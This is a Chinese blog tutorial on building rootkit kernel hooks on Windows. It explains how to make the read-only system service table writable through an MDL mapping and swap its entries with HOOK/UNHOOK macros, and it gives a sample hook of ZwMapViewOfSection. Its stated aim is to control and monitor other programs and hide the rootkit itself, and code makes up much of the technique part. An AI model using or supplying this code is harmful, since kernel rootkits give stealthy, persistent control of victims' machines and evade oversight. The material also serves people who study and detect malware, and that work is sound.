Rootkit技术之内核钩子原理

以你之姓@ 2022-12-27 11:25 137阅读 0赞

我们知道，应用程序总是离不开系统内核所提供的服务，比如它要使用内存的时候，只要跟 [操作系统][Link 1] 申请就行了，而不用自己操心哪里有空闲的内存空间等问题，实际上，这些问题是由 [操作系统][Link 1] 的内核来代劳的。站在黑客的角度讲，如果能够控制内核，实际上就是控制了内核之上的各种应用程序。本文将向您介绍如何建立内核级钩子来控制 [操作系统][Link 1] 向上提供的各种低级功能。有了内核级钩子，我们不但能够控制、监视其他程序并过滤有关数据，还能用其实现Rootkit本身及其它程序的隐形。   
本文首先回顾系统调用表和内存保护方面的知识，然后讲解如何实现内核钩子，最后对一些重要的内核函数进行了简要的说明。   
  
一、系统调用表   
  
系统调用表又称系统服务表或者服务描述符表，是Windows 内核在进行各种系统操作时所需的一个函数指针表。也就是说，这个表中存放的是提供系统服务的各种函数的地址。当然，该表所指向的都是系统自身的一些函数，但是，如果我们对它做了手脚后，就可以让它指向我们自己的函数。这正是本文要讲解的重点。   
读者一定要注意，修改系统调用表及替换内核函数时，会对系统全局产生影响，稍有不慎就会导致系统崩溃。所以，下手之前，最好对表中的各个函数要有足够的认识，然后才好用我们自己的函数替换这些内核函数的方法。你对它们了解得越多越深，在实现内核钩子的时候就越顺手。但话又说回来，这个系统调用表中的表项实在是太多了，有的指向字符串操作，有的指向客户机/服务器操作，等等。所以要在短时间内了解所有表项是不可能的，所以下文中对它们只做有选择的、概括的介绍。   
  
二、内存保护   
  
现代的Windows操作系统通常将系统调用表所在内存页设为只读来提供保护。如果不能克服这个问题，实施内核钩子技术就是痴人说梦。因为试图向只读内存写入数据也即修改只读内存区时，立刻就会蓝屏。为此，先让我们来了解一下内存保护方面的有关知识。   
内存描述符表是内存保护的一大关键，具体定义详见微软DDK中的ntddk.h头文件，我们这里仅做简要介绍：   
typedef struct \_MDL \{   
 struct \_MDL \*Next;   
 CSHORT Size;   
 CSHORT MdlFlags;   
 struct \_EPROCESS \*Process;   
 PVOID MappedSystemVa;   
 PVOID StartVa;   
 ULONG ByteCount;   
 ULONG ByteOffset;   
\} MDL, \*PMDL;   
\#define MDL\_MAPPED\_TO\_SYSTEM\_VA 0x0001   
\#define MDL\_PAGES\_LOCKED 0x0002   
\#define MDL\_SOURCE\_IS\_NONPAGED\_POOL 0x0004   
\#define MDL\_ALLOCATED\_FIXED\_SIZE 0x0008   
\#define MDL\_PARTIAL 0x0010   
\#define MDL\_PARTIAL\_HAS\_BEEN\_MAPPED 0x0020   
\#define MDL\_IO\_PAGE\_READ 0x0040   
\#define MDL\_WRITE\_OPERATION 0x0080   
\#define MDL\_PARENT\_MAPPED\_SYSTEM\_VA 0x0100   
\#define MDL\_FREE\_EXTRA\_PTES 0x0200   
\#define MDL\_IO\_SPACE 0x0800   
\#define MDL\_NETWORK\_HEADER 0x1000   
\#define MDL\_MAPPING\_CAN\_FAIL 0x2000   
\#define MDL\_ALLOCATED\_MUST\_SUCCEED 0x4000   
\#define MDL\_MAPPING\_FLAGS (MDL\_MAPPED\_TO\_SYSTEM\_VA | \\   
 MDL\_PAGES\_LOCKED | \\   
 MDL\_SOURCE\_IS\_NONPAGED\_POOL | \\   
 MDL\_PARTIAL\_HAS\_BEEN\_MAPPED | \\   
 MDL\_PARENT\_MAPPED\_SYSTEM\_VA | \\   
 MDL\_SYSTEM\_VA | \\   
 MDL\_IO\_SPACE )   
  
  
内存描述符表(MDL)的作用是将虚拟内存映射成物理页。如果将系统调用表所在内存页的MDL的MDLFlags成员设为MDL\_MAPPED\_TO\_SYSTEM\_VA 并且该页面被锁定的话，那么就可以使用内核钩子技术了。以下代码将可以达此目的：   
\#pragma pack(1)   
typedef struct ServiceDescriptorEntry   
\{   
 unsigned int \*ServiceTableBase;   
 unsigned int \*ServiceCounterTableBase;   
 unsigned int NumberOfServices;   
 unsigned char \*ParamTableBase;   
\} ServiceDescriptorTableEntry\_t, \*PServiceDescriptorTableEntry\_t;   
\#pragma pack()   
\_\_declspec(dllimport) ServiceDescriptorTableEntry\_t KeServiceDescriptorTable;   
PVOID\* NewSystemCallTable;   
PMDL pMyMDL = MmCreateMdl( NULL,   
 KeServiceDescriptorTable.ServiceTableBase,   
 KeServiceDescriptorTable.NumberOfServices \* 4 );   
MmBuildMdlForNonPagedPool( pMyMDL );   
pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL\_MAPPED\_TO\_SYSTEM\_VA;   
NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );   
好了，我们现在可以通过NewSystemCallTable来新建系统调用表了。系统调用表如下图所示。   
  
[![点击这里用新窗口浏览图片][200842503553993.jpg]][200842503553993.jpg]   
图1 系统调用表示意图   
  
进行挂钩时，可以使用以下宏：   
\#define HOOK\_INDEX(function2hook) \*(PULONG)((PUCHAR)function2hook+1)   
\#define HOOK(functionName, newPointer2Function, oldPointer2Function ) \\   
 oldPointer2Function = (PVOID) InterlockedExchange( (PLONG)   
&NewSystemCallTable\[HOOK\_INDEX(functionName)\], (LONG) newPointer2Function)   
\#define UNHOOK(functionName, oldPointer2Function) \\   
 InterlockedExchange( (PLONG) &NewSystemCallTable\[HOOK\_INDEX(functionName)\]   
 , (LONG)   
oldPointer2Function)   
  
使这些宏后，钩子技术会变得更简单，也更安全。因为InterlockedExchange 是原子函数，不会要求中止中断，所以交换指针的方式是安全的；另外，它也不需要用一个宏挂钩之后用另一个宏卸载钩子，所以也更方便。下图向我们展示了拦截系统调用表的过程。   
  
[![点击这里用新窗口浏览图片][200842503558251.jpg]][200842503558251.jpg]   
图2 系统调用表拦截技术示意图   
  
系统调用表数据结构KeServiceDescriptorTable不仅含有ntdll.dll 的全部函数指针，还存有系统调用表的基地址和表的大小，当建立我们自己的内存描述符表的时候，这些信息是不可或缺的。利用MDL\_MAPPED\_TO\_SYSTEM\_VA 标志，我们可以建立一个不可页出（即不会被换到内存之外）的MDL ，这样我们就可以将其锁定，并把返回的地址用于我们自己的系统调用表，重要的是，这个系统调用表是可写的。   
  
三、定义钩子函数   
  
内核钩子主要有三部分组成：要钩取的函数（在下文中称为目标函数）、替代要钩取的函数的函数（在下文中成为钩子函数）和系统调用表。前面部分介绍了系统调用表的问题，下面开始介绍钩子函数。一般说来，当定义自己的钩子函数时，可以先到DDK 的头文件中找到所想要的函数的原型，然后，稍加修改就能把目标函数变成钩子函数了。   
  
例如，ZwMapViewOfSection 是一个内核函数，允许应用程序把从动态链接库导出的函数映射至内存。如果我们想要钩住这个内核函数，那么可以到ntddk.h头文件中查看其函数原型，如下所示：  
  
NTSYSAPI   
NTSTATUS   
NTAPI   
ZwMapViewOfSection(   
 IN HANDLE SectionHandle,   
 IN HANDLE ProcessHandle,   
 IN OUT PVOID \*BaseAddress,   
 IN ULONG ZeroBits,   
 IN ULONG CommitSize,   
 IN OUT PLARGE\_INTEGER SectionOffset OPTIONAL,   
 IN OUT PSIZE\_T ViewSize,   
 IN SECTION\_INHERIT InheritDisposition,   
 IN ULONG AllocationType,   
 IN ULONG Protect );   
  
有了函数原型，我们就可以确定指向目标函数的指针了，如下所示：   
  
typedef NTSTATUS (\*ZWMAPVIEWOFSECTION)(   
 IN HANDLE SectionHandle,   
 IN HANDLE ProcessHandle,   
 IN OUT PVOID \*BaseAddress,   
 IN ULONG ZeroBits,   
 IN ULONG CommitSize,   
 IN OUT PLARGE\_INTEGER SectionOffset OPTIONAL,   
 IN OUT PSIZE\_T ViewSize,   
 IN SECTION\_INHERIT InheritDisposition,   
 IN ULONG AllocationType,   
 IN ULONG Protect );   
ZWMAPVIEWOFSECTION OldZwMapViewOfSection;   
  
钩子函数如下所示：   
  
NTSTATUS NewZwMapViewOfSection(   
 IN HANDLE SectionHandle,   
 IN HANDLE ProcessHandle,   
 IN OUT PVOID \*BaseAddress,   
 IN ULONG ZeroBits,   
 IN ULONG CommitSize,   
 IN OUT PLARGE\_INTEGER SectionOffset OPTIONAL,   
 IN OUT PSIZE\_T ViewSize,   
 IN SECTION\_INHERIT InheritDisposition,   
 IN ULONG AllocationType,   
 IN ULONG Protect )   
\{   
 NTSTATUS status;   
 DbgPrint("comint32: NewZwMapViewOfSection called.");   
 //我们可以对输入为所欲为，既可以马上返回，也可以继续执行原函数   
 status = OldZwMapViewOfSection(SectionHandle,   
 ProcessHandle,   
 BaseAddress,   
 ZeroBits,   
 CommitSize,   
 SectionOffset OPTIONAL,   
 ViewSize,   
 InheritDisposition,   
 AllocationType,   
 Protect );   
 // 我们可以在此对输出为所欲为，想返回什么，就返回什么   
 return status;   
\}   
  
好了，钩子技术的三大件已经准备好了。现在，我们就可以像下面这样使用它们：   
HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection );   
  
如果你打算使用DriverUnload ()的话，可千万不要忘了卸载钩子。   
  
四、内核函数系列   
  
经过上面的介绍，我们已经了解了系统调用表有关知识，也已知道如何拦截系统调用表中的函数，下面，我们再来了解一下我们要钩取的函数：目标函数。这方面，如果我们不仅了解系统调用表中有哪些函数，还知道这些函数的工作机制就最好了。但实际上，ntdll.dll 中的导出函数有好几百个，别说一个一个的探究，就是把它们都列出来，看着看着头都大了。幸运的是，我们不必了解每个函数，只要了解其所在的系列就行了。为什么这么说？因为微软已经按照函数的功能对Ntdll.dll的导出函数进行了分组，并冠以意义明确的前缀，所以根据函数系列的前缀就能明白它们的大体功能了。下面对这些函数系列进行简单的介绍：   
  
1.KiEtw系列：本系列内核函数用于系统内核，这些函数只能从内核的内部进行调用，常用的有：KiUserCallbackDispatcher、KiRaiseUserExceptionDispatcher、KiUserApcDispatcher、KiUserExceptionDispatcher等。   
  
2.Csr系列：此系列函数用于客户机和服务器运行时，如果您想拦截客户机/服务器方面的操作，那么就需要对Csr系列内核函数做进一步的了解。常见的有：CsrClientCallServer、CsrCaptureMessageBuffer、CsrConnectClientToServer和CrsNewThread等。   
  
3.Ldr系列：本系列内核函数用于加载程序管理器，如果你打算拦截加载程序的话，那么请进一步考察这组以Ldr为前缀的函数，常用的有：LdrInitializeThunk、LdrLockLoaderLock、LdrUnlockLoaderLock、LdrGetDllHandle、LdrGetProcedureAddress等。   
  
4.Dbg系列：本系列内核函数用于调试管理，如果打算拦截调试操作的话，那么请进一步考察这组以Dbg为前缀的函数，常用的函数包括：、DbgBreakPoint、DbgUserBreakPoint、DbgPrint和DbgUiConnectToDbg等。   
  
5.Etw系列：本系列内核函数用于追踪窗口事件，如果你打算拦截追踪之类的操作的话,那么请进一步考察这组以Etw为前缀的函数。常用的函数包括：EtwTraceEvent、EtwEnableTrace、EtwGetTraceEnableLevel和EtwGetTraceEnableFlags等。   
  
6.Rtl系列：本系列内核函数用于运行时库，以Rtl为前缀的函数可以完成多种操作，例如字符串、线程、资源、临界区、安全对象的初始化和使用，内存、进程异常和数据类型的处理，还用于完成定时器、堆、IPv4和IPv6方面的操作，以及压缩和解压缩等。   
  
7.Pfx系列：本系列内核函数用于ANSI字符串操作，如果你打算拦截ASNI串表方面的操作的话，就需要进一步了解这些函数。常用的包括：PfxInitialize、PfxRemovePrefix、PfxInsertPrefix、PfxFindPrefix等。   
  
8.Zw系列：本系列内核函数用于文件和注册表方面的操作，比如文件操作、注册表操作、访问进程、事件操作、令牌操作、进程操作和端口操作等。   
  
这里介绍的只是内核函数中的一部分，限于篇幅其他部分在此不作介绍。   
  
六、结束语   
  
本文深入介绍了系统调用表和内存保护方面的知识，并介绍了实现钩子函数的方法，最后对一些重要的内核函数进行了简要的说明。有了内核级钩子，我们不但能够控制、监视其他程序并过滤有关数据，还能达到隐藏Rootkit本身及其它程序的目的。需要说明的是，尽管可以通过内核钩子技术来实现rootkit所需的一些功能，但是，现实中的rootkit通常组合使用多种其它技术，如进程注射、分层驱动过滤等。更多的技术，将在后文中分别加以介绍。

[Link 1]: http://www.myhack58.com/Article/48/Article_048_1.htm
[200842503553993.jpg]: /images/20221120/a2e87323da3e41e79a6ab072d6786bf2.png
[200842503558251.jpg]: /images/20221120/919e1942013b402d8677e2e4e77a0fe5.png